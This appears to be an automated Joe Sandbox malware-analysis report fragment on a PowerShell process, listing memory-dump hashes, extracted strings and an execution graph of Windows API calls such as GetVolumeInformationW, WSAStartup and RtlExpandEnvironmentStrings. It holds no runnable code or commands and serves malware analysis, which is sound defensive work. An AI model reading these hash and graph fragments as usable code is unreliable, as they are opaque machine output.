                                                                                                                  • Opcode Fuzzy Hash: 5078af0808e81ea49901a27e426648df17de2766aec9b591e13f4dcc84921076
                                                                                                                  • Instruction Fuzzy Hash: 88D0123490420A8FC708DF64D44646DBFB4A744205F004155D94597384EA305C01CFC1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a532e0d6c130b46c1292c9a88b76a28f6e51102ba580d6649e852403f212d5d7
                                                                                                                  • Instruction ID: 2c1b99754724d9ad8b071f75af8059111af80096530a363cca1b122c19ca19af
                                                                                                                  • Opcode Fuzzy Hash: a532e0d6c130b46c1292c9a88b76a28f6e51102ba580d6649e852403f212d5d7
                                                                                                                  • Instruction Fuzzy Hash: DDD09E3814D3C59FC7178B7C94954183F305D0315571504DDD485DF9B7C6668485CB56
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5874586b99442099dad70dfe9bf3340bf3f579d1aed3c1ff977d262b7838a134
                                                                                                                  • Instruction ID: 28314c644f063074c97903240413b92d3f0b9e5b29b9069d8c80eb58a228b3c6
                                                                                                                  • Opcode Fuzzy Hash: 5874586b99442099dad70dfe9bf3340bf3f579d1aed3c1ff977d262b7838a134
                                                                                                                  • Instruction Fuzzy Hash: 28C0122404E3D01EEF03933888991017FB1098311A30E01CAC081CF8A3C968884ACB43
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d9a11d0aa0c2d0ecb7e7db7a94117ebd3743f945614dfff6a5952f2c44c54d7d
                                                                                                                  • Instruction ID: d16a944e66b846561d16e14eae2ba2133d79343f7e7efcb09eac311cc199a5a8
                                                                                                                  • Opcode Fuzzy Hash: d9a11d0aa0c2d0ecb7e7db7a94117ebd3743f945614dfff6a5952f2c44c54d7d
                                                                                                                  • Instruction Fuzzy Hash: 6DB09230045749CFC2586F75A444815732DAB4021978004ACE80E4AAA68F3AE885CA48
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ctk$4'kq$4'kq$4'kq$4'kq$piIk$tPkq$tPkq$$kq$$kq
                                                                                                                  • API String ID: 0-2862391241
                                                                                                                  • Opcode ID: dcdd8f9f719be023563b867fe20db242a9d96fb4a9922fd5921a8868c7e26422
                                                                                                                  • Instruction ID: 629504d75313dca173c346a8f5b617e76a18fe2b791e05c7c23fb9a1bd171c74
                                                                                                                  • Opcode Fuzzy Hash: dcdd8f9f719be023563b867fe20db242a9d96fb4a9922fd5921a8868c7e26422
                                                                                                                  • Instruction Fuzzy Hash: DFE159B1F0430A8FC7219F68980866BBBF2AFE5311F28847BD516CB655DB35C885C7A1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq$wl$wl
                                                                                                                  • API String ID: 0-1027809815
                                                                                                                  • Opcode ID: 3ecf1d86c4ae3fb7fc4abdb842cddd1d21e2d9912944f0f61ddc40495e09a189
                                                                                                                  • Instruction ID: 462a7a442fc8fb2cd6f50dcd9e8e0bf33eb31b4e3075d6cf3ddf57253c66701a
                                                                                                                  • Opcode Fuzzy Hash: 3ecf1d86c4ae3fb7fc4abdb842cddd1d21e2d9912944f0f61ddc40495e09a189
                                                                                                                  • Instruction Fuzzy Hash: E0A1ACB17043869FC7249F69C801766BBF2AFE6314F28846AD446CBB91CA35DC45D3A2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$$kq$$kq$$kq$wl$wl
                                                                                                                  • API String ID: 0-1484100296
                                                                                                                  • Opcode ID: 11617d3892b0d41a3f8ff4625cccfdfb4a5c9bde43d853812c60d24a9f48540c
                                                                                                                  • Instruction ID: 7d35737fe7eff4f3a32f9cb4e0aad64ab31f37f7b8c1967e9751175a774908ea
                                                                                                                  • Opcode Fuzzy Hash: 11617d3892b0d41a3f8ff4625cccfdfb4a5c9bde43d853812c60d24a9f48540c
                                                                                                                  • Instruction Fuzzy Hash: DC5179F170438B9FCB344E698800266BBE6AFE2255F28847AD407CFB51DA35C845D793
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: fpq$4'kq$4'kq$4'kq$4'kq
                                                                                                                  • API String ID: 0-683752427
                                                                                                                  • Opcode ID: 1f2a84a7cd212c97347414c210095e6e9a4e24c0306b438ba2d1545cc7dc1eba
                                                                                                                  • Instruction ID: cfd62e6c9835dfe61581c6f7fe578c68e986db357a43b87bc0639125eac3b0a1
                                                                                                                  • Opcode Fuzzy Hash: 1f2a84a7cd212c97347414c210095e6e9a4e24c0306b438ba2d1545cc7dc1eba
                                                                                                                  • Instruction Fuzzy Hash: 02F146B17083468FC7259B68981076ABBA2AFD2215F1884BBD546CB392DB31DC45C7A1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: uo^$uo^$uo^$uo^$uo^
                                                                                                                  • API String ID: 0-4180984676
                                                                                                                  • Opcode ID: 96c02e34656b944561eb99397e2ef47aa8b4336af625e1a0efc3cc4fde64184a
                                                                                                                  • Instruction ID: c9d1e03aa1bafabf20bec930df073745d2addc93618535a8ebce73f4d5833246
                                                                                                                  • Opcode Fuzzy Hash: 96c02e34656b944561eb99397e2ef47aa8b4336af625e1a0efc3cc4fde64184a
                                                                                                                  • Instruction Fuzzy Hash: 7251802261E3C55FC30B9B3C98A45807FB0AF57298B0E41DBC1D8CF5ABDA24685AC757
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                                                                  • API String ID: 0-1293621312
                                                                                                                  • Opcode ID: c11d24d99882569e2c9038c3be407eab9661eea6f37be74debcaaa0bb2e8dfc2
                                                                                                                  • Instruction ID: b598808f79a5587f2a7bda7660d710c5b46a00be5333a64bfa641c686f3bd717
                                                                                                                  • Opcode Fuzzy Hash: c11d24d99882569e2c9038c3be407eab9661eea6f37be74debcaaa0bb2e8dfc2
                                                                                                                  • Instruction Fuzzy Hash: C7D16CB17043868FC7259F68980076ABBE2AFF1315F24847BD54ACB792DB32D845C7A1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `lq$`lq$`lq$`lq
                                                                                                                  • API String ID: 0-2331155588
                                                                                                                  • Opcode ID: dff453608c97a3b7568b9eaf7cbee27f56db27746baf07dcce561e43b2e7c44e
                                                                                                                  • Instruction ID: 1ceb833f9874f26f8cf83cb108d6ea74784b90acc30fb31f76e8ff5ca0e9b312
                                                                                                                  • Opcode Fuzzy Hash: dff453608c97a3b7568b9eaf7cbee27f56db27746baf07dcce561e43b2e7c44e
                                                                                                                  • Instruction Fuzzy Hash: E3B19574E012099FCB54DFA9D980A9EFBF1FF88304F148629D419AB355DB30A945CF90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `lq$`lq$`lq$`lq
                                                                                                                  • API String ID: 0-2331155588
                                                                                                                  • Opcode ID: ba8e4d8982994ee4b5349f2c6a8645194603a3a060038259d4d223a1cfdce017
                                                                                                                  • Instruction ID: 2a559729ff9266d4eb3945f330e0629f62c5259f718063d01dc02b41dc8604b1
                                                                                                                  • Opcode Fuzzy Hash: ba8e4d8982994ee4b5349f2c6a8645194603a3a060038259d4d223a1cfdce017
                                                                                                                  • Instruction Fuzzy Hash: B9B17574E002099FDB54DFA9D980A9EFBF1FF88304F148629D819AB359DB31A945CF90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: piIk$piIk$piIk$piIk
                                                                                                                  • API String ID: 0-1952045651
                                                                                                                  • Opcode ID: 69321c645be0a1bc4dbb6be560930c19a0d09de6f09b8f9dccda50511749a8cd
                                                                                                                  • Instruction ID: 1559bf66d1f441dc384f01439fae99860e9a0f9422029c799f0450142e941af5
                                                                                                                  • Opcode Fuzzy Hash: 69321c645be0a1bc4dbb6be560930c19a0d09de6f09b8f9dccda50511749a8cd
                                                                                                                  • Instruction Fuzzy Hash: 70519FB170020ADFCB249F6895416AABBF1FFA5310F44847AD453CF2A2DB35C885C752
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                  • API String ID: 0-2881790790
                                                                                                                  • Opcode ID: 36e0188623726f8592bdcf341d54d12ef302189639cd179da508e19cd97768ce
                                                                                                                  • Instruction ID: be3df4e1c5fc6116b992308498fa9da1aaaaf63ea42bb7189133022518dcc639
                                                                                                                  • Opcode Fuzzy Hash: 36e0188623726f8592bdcf341d54d12ef302189639cd179da508e19cd97768ce
                                                                                                                  • Instruction Fuzzy Hash: EF217BB231430A9BDB74AD3A9800737BBDBABE0715F24883AA507CB785DD79D851C361
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1744520260.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7870000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$$kq$$kq
                                                                                                                  • API String ID: 0-1727931526
                                                                                                                  • Opcode ID: eb1c5cdfc1c187a5c5d1adc7a8e2b18faaf74caa4a6dad2bff4d1ed1a81db1b9
                                                                                                                  • Instruction ID: 2b8225154b6b61b6b3a56e2c8b299436e34c1dfa46551471f1fe49a55b3f01a3
                                                                                                                  • Opcode Fuzzy Hash: eb1c5cdfc1c187a5c5d1adc7a8e2b18faaf74caa4a6dad2bff4d1ed1a81db1b9
                                                                                                                  • Instruction Fuzzy Hash: D201F56160D3C78FC73B563859202656FF26FA3150B2A04ABD082CF397CA18DC0AC3A7

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:17.3%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:12.4%
                                                                                                                  Total number of Nodes:315
                                                                                                                  Total number of Limit Nodes:18
                                                                                                                  execution_graph 7551 abde48 7555 ab95a0 7551->7555 7553 abde54 CoUninitialize 7554 abde80 7553->7554 7556 ab95b4 7555->7556 7556->7553 7843 abd2c8 7844 abd2e0 7843->7844 7846 abd323 7844->7846 7847 aed910 LdrInitializeThunk 7844->7847 7847->7846 7536 ab9cae 7537 ab9cb6 WSAStartup 7536->7537 7867 ac11e9 7868 ac1203 7867->7868 7869 ac1398 RtlExpandEnvironmentStrings 7868->7869 7873 abec17 7868->7873 7870 ac140f 7869->7870 7871 ac148d RtlExpandEnvironmentStrings 7870->7871 7870->7873 7871->7873 7874 ac150d 7871->7874 7872 acef80 2 API calls 7872->7873 7874->7872 7557 abdc41 7558 abdc51 7557->7558 7587 ad3120 7558->7587 7560 abdc57 7600 ad37d0 7560->7600 7562 abdc77 7613 ad3a60 7562->7613 7564 abdc97 7626 ad5850 7564->7626 7568 abdcc0 7646 ad6340 7568->7646 7570 abdcc9 7659 ad7cb0 7570->7659 7572 abdcf2 7573 ad3120 4 API calls 7572->7573 7574 abdd36 7573->7574 7575 ad37d0 4 API calls 7574->7575 7576 abdd56 7575->7576 7577 ad3a60 3 API calls 7576->7577 7578 abdd76 7577->7578 7579 ad5850 3 API calls 7578->7579 7580 abdd96 7579->7580 7581 ad6000 2 API calls 7580->7581 7582 abdd9f 7581->7582 7583 ad6340 2 API calls 7582->7583 7584 abdda8 7583->7584 7585 ad7cb0 3 API calls 7584->7585 7586 abddd1 7585->7586 7588 ad3190 7587->7588 7588->7588 7589 ad31c0 RtlExpandEnvironmentStrings 7588->7589 7590 ad3210 7589->7590 7590->7590 7591 ad35e1 7590->7591 7593 ad328c RtlExpandEnvironmentStrings 7590->7593 7594 ad32b4 7590->7594 7595 ad3448 7590->7595 7597 ad32dc 7590->7597 7598 ad3420 7590->7598 7675 ad1060 7591->7675 7593->7591 7593->7594 7593->7595 7593->7597 7593->7598 7594->7560 7595->7595 7599 af0ba0 LdrInitializeThunk 7595->7599 7597->7597 7671 af0ba0 7597->7671 7598->7591 7598->7594 7598->7595 7599->7594 7601 ad3860 7600->7601 7601->7601 7602 ad3876 RtlExpandEnvironmentStrings 7601->7602 7604 ad38c0 7602->7604 7605 ad395e 7604->7605 7607 ad3bf1 7604->7607 7608 ad3939 RtlExpandEnvironmentStrings 7604->7608 7610 ad3a3b 7604->7610 7705 aefe20 7604->7705 7701 acef80 7605->7701 7713 aefb80 7607->7713 7608->7604 7608->7605 7608->7607 7608->7610 7610->7562 7612 ad3c2a 7612->7610 7721 aefa50 7612->7721 7614 ad3a6e 7613->7614 7615 aefa50 LdrInitializeThunk 7614->7615 7621 ad3922 7615->7621 7616 aefe20 2 API calls 7616->7621 7617 ad3bf1 7622 aefb80 2 API calls 7617->7622 7618 ad395e 7618->7618 7620 acef80 2 API calls 7618->7620 7619 ad3a3b 7619->7564 7620->7619 7621->7616 7621->7617 7621->7618 7621->7619 7623 ad3939 RtlExpandEnvironmentStrings 7621->7623 7624 ad3c2a 7622->7624 7623->7617 7623->7618 7623->7619 7623->7621 7624->7619 7625 aefa50 LdrInitializeThunk 7624->7625 7625->7624 7627 ad5876 7626->7627 7628 ad5ad0 7626->7628 7633 ad5b04 7626->7633 7635 abdcb7 7626->7635 7627->7628 7630 aefe20 2 API calls 7627->7630 7632 aefa50 LdrInitializeThunk 7627->7632 7627->7633 7627->7635 7730 aed880 7628->7730 7629 aefa50 LdrInitializeThunk 7629->7633 7630->7627 7632->7627 7633->7629 7634 aefb80 2 API calls 7633->7634 7633->7635 7637 aed910 LdrInitializeThunk 7633->7637 7736 af0480 7633->7736 7634->7633 7638 ad6000 7635->7638 7637->7633 7639 ad6020 7638->7639 7640 ad606e 7639->7640 7746 aed910 LdrInitializeThunk 7639->7746 7642 aebc90 RtlAllocateHeap 7640->7642 7645 ad614e 7640->7645 7643 ad60e1 7642->7643 7643->7645 7747 aed910 LdrInitializeThunk 7643->7747 7645->7568 7645->7645 7748 ad6360 7646->7748 7648 ad6354 7648->7570 7649 ad6349 7649->7648 7761 ae98a0 7649->7761 7651 af09e0 LdrInitializeThunk 7657 ad6d75 7651->7657 7653 ad6c18 7653->7651 7655 ad6f6f 7653->7655 7653->7657 7658 ad6c2b 7653->7658 7778 aed910 LdrInitializeThunk 7655->7778 7657->7655 7657->7658 7768 af0e50 7657->7768 7774 af0d70 7657->7774 7658->7570 7660 ad7d60 7659->7660 7660->7660 7661 ad7d86 RtlExpandEnvironmentStrings 7660->7661 7662 ad7de0 7661->7662 7662->7662 7663 ad7e5b 7662->7663 7664 ad7e38 RtlExpandEnvironmentStrings 7662->7664 7665 ad7e75 7662->7665 7667 ad8120 7662->7667 7663->7572 7664->7663 7664->7665 7664->7667 7665->7663 7666 af0d70 LdrInitializeThunk 7665->7666 7665->7667 7669 ad8258 7665->7669 7666->7665 7667->7667 7668 af09e0 LdrInitializeThunk 7667->7668 7668->7669 7669->7669 7670 af09e0 LdrInitializeThunk 7669->7670 7670->7669 7672 af0bc0 7671->7672 7673 af0d1e 7672->7673 7687 aed910 LdrInitializeThunk 7672->7687 7673->7598 7688 af09e0 7675->7688 7677 ad184f 7677->7594 7678 ad10a3 7678->7677 7692 aebc90 7678->7692 7680 ad10e1 7686 ad1199 7680->7686 7695 aed910 LdrInitializeThunk 7680->7695 7682 aebc90 RtlAllocateHeap 7682->7686 7684 ad1789 7684->7677 7697 aed910 LdrInitializeThunk 7684->7697 7686->7682 7686->7684 7696 aed910 LdrInitializeThunk 7686->7696 7687->7673 7690 af0a00 7688->7690 7689 af0b4e 7689->7678 7690->7689 7698 aed910 LdrInitializeThunk 7690->7698 7699 aef000 7692->7699 7694 aebc9a RtlAllocateHeap 7694->7680 7695->7680 7696->7686 7697->7684 7698->7689 7700 aef010 7699->7700 7700->7694 7700->7700 7702 acefb0 7701->7702 7702->7702 7703 ad1060 2 API calls 7702->7703 7704 acefd9 7703->7704 7704->7610 7706 aefe40 7705->7706 7707 aefeae 7706->7707 7725 aed910 LdrInitializeThunk 7706->7725 7708 aebc90 RtlAllocateHeap 7707->7708 7711 aeffae 7707->7711 7710 aeff1a 7708->7710 7710->7711 7726 aed910 LdrInitializeThunk 7710->7726 7711->7604 7714 aefba0 7713->7714 7716 aefc0e 7714->7716 7727 aed910 LdrInitializeThunk 7714->7727 7715 aefd0e 7715->7612 7716->7715 7717 aebc90 RtlAllocateHeap 7716->7717 7719 aefc7a 7717->7719 7719->7715 7728 aed910 LdrInitializeThunk 7719->7728 7723 aefa70 7721->7723 7722 aefb4f 7722->7612 7723->7722 7729 aed910 LdrInitializeThunk 7723->7729 7725->7707 7726->7711 7727->7716 7728->7715 7729->7722 7731 aed899 7730->7731 7732 aed8e5 7730->7732 7734 aed8d0 RtlReAllocateHeap 7731->7734 7735 aed8e3 7731->7735 7733 aebc90 RtlAllocateHeap 7732->7733 7733->7735 7734->7735 7735->7633 7737 af048f 7736->7737 7738 af05ef 7737->7738 7744 aed910 LdrInitializeThunk 7737->7744 7739 aebc90 RtlAllocateHeap 7738->7739 7742 af074e 7738->7742 7741 af0675 7739->7741 7741->7742 7745 aed910 LdrInitializeThunk 7741->7745 7742->7633 7744->7738 7745->7742 7746->7640 7747->7645 7749 ad63a0 7748->7749 7749->7749 7779 aebce0 7749->7779 7751 ad640d 7787 aebf90 7751->7787 7753 ad6425 7803 aec100 7753->7803 7759 ad67cc 7759->7649 7760 ad64fc 7760->7753 7760->7759 7799 aec440 7760->7799 7765 ae98d0 7761->7765 7762 aefa50 LdrInitializeThunk 7762->7765 7763 aefe20 2 API calls 7763->7765 7764 ae9a1c 7764->7653 7765->7762 7765->7763 7765->7764 7766 af0480 2 API calls 7765->7766 7814 aed910 LdrInitializeThunk 7765->7814 7766->7765 7769 af0e70 7768->7769 7772 af0ede 7769->7772 7815 aed910 LdrInitializeThunk 7769->7815 7770 af0f9e 7770->7657 7772->7770 7816 aed910 LdrInitializeThunk 7772->7816 7775 af0d90 7774->7775 7776 af0dfe 7775->7776 7817 aed910 LdrInitializeThunk 7775->7817 7776->7657 7778->7658 7780 aebd00 7779->7780 7780->7780 7781 aebd5e 7780->7781 7807 aed910 LdrInitializeThunk 7780->7807 7782 aebc90 RtlAllocateHeap 7781->7782 7786 aebe8f 7781->7786 7784 aebe0f 7782->7784 7784->7786 7808 aed910 LdrInitializeThunk 7784->7808 7786->7751 7788 ad6419 7787->7788 7789 aebfa2 7787->7789 7788->7753 7788->7760 7791 aec510 7788->7791 7789->7788 7809 aed910 LdrInitializeThunk 7789->7809 7792 aec560 7791->7792 7798 aec5be 7792->7798 7810 aed910 LdrInitializeThunk 7792->7810 7793 aecd0e 7793->7760 7795 aecca2 7795->7793 7811 aed910 LdrInitializeThunk 7795->7811 7797 aed910 LdrInitializeThunk 7797->7798 7798->7793 7798->7795 7798->7797 7800 aec460 7799->7800 7800->7800 7801 aec4ce 7800->7801 7812 aed910 LdrInitializeThunk 7800->7812 7801->7760 7804 aec10a 7803->7804 7805 ad6a1b 7803->7805 7804->7805 7813 aed910 LdrInitializeThunk 7804->7813 7805->7649 7807->7781 7808->7786 7809->7788 7810->7798 7811->7793 7812->7801 7813->7805 7814->7765 7815->7772 7816->7770 7817->7776 7875 abcfe1 7876 abcfe0 7875->7876 7876->7875 7879 abcfee 7876->7879 7881 aed910 LdrInitializeThunk 7876->7881 7878 aed910 LdrInitializeThunk 7878->7879 7879->7878 7880 abd1a2 7879->7880 7881->7879 7907 abd521 7908 abd520 7907->7908 7908->7907 7911 abd52e 7908->7911 7913 aed910 LdrInitializeThunk 7908->7913 7910 abd5ce 7911->7910 7914 aed910 LdrInitializeThunk 7911->7914 7913->7911 7914->7910 7818 ab8640 7820 ab864f 7818->7820 7819 ab88ee 7821 aebc90 RtlAllocateHeap 7820->7821 7823 ab88ca 7820->7823 7822 ab8797 7821->7822 7822->7823 7827 abc660 CoInitializeEx 7822->7827 7828 3227aec RtlExitUserProcess 7823->7828 7830 3227ae7 7823->7830 7829 3227b84 7828->7829 7829->7819 7831 3227aec RtlExitUserProcess 7830->7831 7832 3227b84 7831->7832 7832->7819 7862 abbd80 7863 aed880 2 API calls 7862->7863 7864 abbd88 7863->7864 7865 aed880 2 API calls 7864->7865 7866 abbda6 7865->7866 7931 abdb40 7932 abdb50 7931->7932 7933 abdb9e 7932->7933 7937 aed910 LdrInitializeThunk 7932->7937 7938 aed910 LdrInitializeThunk 7933->7938 7936 abde30 7937->7933 7938->7936 7890 ac4dc0 7891 ac4de0 7890->7891 7891->7891 7892 af09e0 LdrInitializeThunk 7891->7892 7893 ac4f5d 7892->7893 7894 ac4f7f 7893->7894 7895 af0d70 LdrInitializeThunk 7893->7895 7898 ac5155 7893->7898 7902 ac4fbc 7893->7902 7896 af0e50 LdrInitializeThunk 7894->7896 7894->7898 7900 ac522b 7894->7900 7894->7902 7903 ac534d 7894->7903 7895->7894 7897 ac4fad 7896->7897 7897->7898 7897->7900 7897->7902 7897->7903 7898->7902 7906 aed910 LdrInitializeThunk 7898->7906 7900->7900 7901 af09e0 LdrInitializeThunk 7900->7901 7901->7903 7902->7902 7903->7903 7904 af09e0 LdrInitializeThunk 7903->7904 7905 ac549d 7904->7905 7906->7902 7915 aba11b 7916 aba200 7915->7916 7916->7916 7919 abad90 7916->7919 7918 aba243 7920 abae20 7919->7920 7920->7920 7921 aed880 2 API calls 7920->7921 7922 abae45 7920->7922 7921->7922 7922->7918 7538 abd6f8 7539 abd720 7538->7539 7542 ae8860 7539->7542 7541 abd88d 7541->7541 7543 ae8890 7542->7543 7545 ae8b8b CoSetProxyBlanket 7543->7545 7547 ae8bab 7543->7547 7544 ae8ee5 GetVolumeInformationW 7546 ae8f03 7544->7546 7545->7547 7546->7541 7547->7544 7839 abd0ff 7840 abd00a 7839->7840 7840->7839 7841 abd1a2 7840->7841 7842 aed910 LdrInitializeThunk 7840->7842 7842->7840 7833 abc69e CoInitializeSecurity 7853 abd1b2 7854 abd1d0 7853->7854 7854->7854 7855 abd27e 7854->7855 7857 aed910 LdrInitializeThunk 7854->7857 7857->7855 7923 3227e99 7924 3227eb7 GetPEB 7923->7924 7926 3227f04 7924->7926 7927 abed75 7928 abed8f 7927->7928 7929 abf47f RtlExpandEnvironmentStrings 7928->7929 7930 abec17 7928->7930 7929->7930 7548 c74598 7549 c745a5 VirtualAlloc 7548->7549 7882 af0ff0 7883 af1010 7882->7883 7886 af107e 7883->7886 7888 aed910 LdrInitializeThunk 7883->7888 7884 af113e 7886->7884 7889 aed910 LdrInitializeThunk 7886->7889 7888->7886 7889->7884

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 ae8860-ae8889 1 ae8890-ae88c2 0->1 1->1 2 ae88c4-ae88d9 1->2 3 ae88e0-ae8912 2->3 3->3 4 ae8914-ae8954 3->4 5 ae8960-ae8988 4->5 5->5 6 ae898a-ae89a3 5->6 8 ae8a1a-ae8a23 6->8 9 ae89a5-ae89af 6->9 11 ae8a30-ae8a96 8->11 10 ae89b0-ae89c9 9->10 10->10 12 ae89cb-ae89de 10->12 11->11 13 ae8a98-ae8aef 11->13 14 ae89e0-ae8a0e 12->14 17 ae8ed5-ae8f01 call aef450 GetVolumeInformationW 13->17 18 ae8af5-ae8b29 13->18 14->14 16 ae8a10-ae8a15 14->16 16->8 23 ae8f0b-ae8f0d 17->23 24 ae8f03-ae8f07 17->24 19 ae8b30-ae8b59 18->19 19->19 21 ae8b5b-ae8b85 19->21 32 ae8b8b-ae8ba5 CoSetProxyBlanket 21->32 33 ae8ec5-ae8ed1 21->33 26 ae8f1d-ae8f28 23->26 24->23 27 ae8f2a-ae8f31 26->27 28 ae8f34-ae8f46 26->28 27->28 29 ae8f50-ae8fb0 28->29 29->29 31 ae8fb2-ae8fe7 29->31 34 ae8ff0-ae903a 31->34 35 ae8ebb-ae8ec1 32->35 36 ae8bab-ae8bbb 32->36 33->17 34->34 37 ae903c-ae906d call acdc90 34->37 35->33 39 ae8bc0-ae8be3 36->39 43 ae9070-ae9078 37->43 39->39 41 ae8be5-ae8c65 39->41 46 ae8c70-ae8ca6 41->46 43->43 45 ae907a-ae907c 43->45 48 ae9082-ae9092 call ab8060 45->48 49 ae8f10-ae8f17 45->49 46->46 47 ae8ca8-ae8cd5 46->47 55 ae8cdb-ae8cfd 47->55 56 ae8ea9-ae8eb5 47->56 48->49 49->26 51 ae9097-ae909e 49->51 59 ae8e9f-ae8ea5 55->59 60 ae8d03-ae8d06 55->60 56->35 59->56 60->59 61 ae8d0c-ae8d11 60->61 61->59 62 ae8d17-ae8d62 61->62 64 ae8d70-ae8d99 62->64 64->64 65 ae8d9b-ae8dad 64->65 66 ae8db1-ae8db3 65->66 67 ae8e8e-ae8e9b 66->67 68 ae8db9-ae8dbf 66->68 67->59 68->67 69 ae8dc5-ae8dd3 68->69 70 ae8e0d 69->70 71 ae8dd5-ae8dda 69->71 74 ae8e0f-ae8e4d call ab7ed0 call ab8d20 70->74 73 ae8dec-ae8df0 71->73 75 ae8df2-ae8dfb 73->75 76 ae8de0 73->76 85 ae8e4f-ae8e65 74->85 86 ae8e7d-ae8e8a call ab7ee0 74->86 79 ae8dfd-ae8e00 75->79 80 ae8e02-ae8e06 75->80 78 ae8de1-ae8dea 76->78 78->73 78->74 79->78 80->78 82 ae8e08-ae8e0b 80->82 82->78 85->86 87 ae8e67-ae8e74 85->87 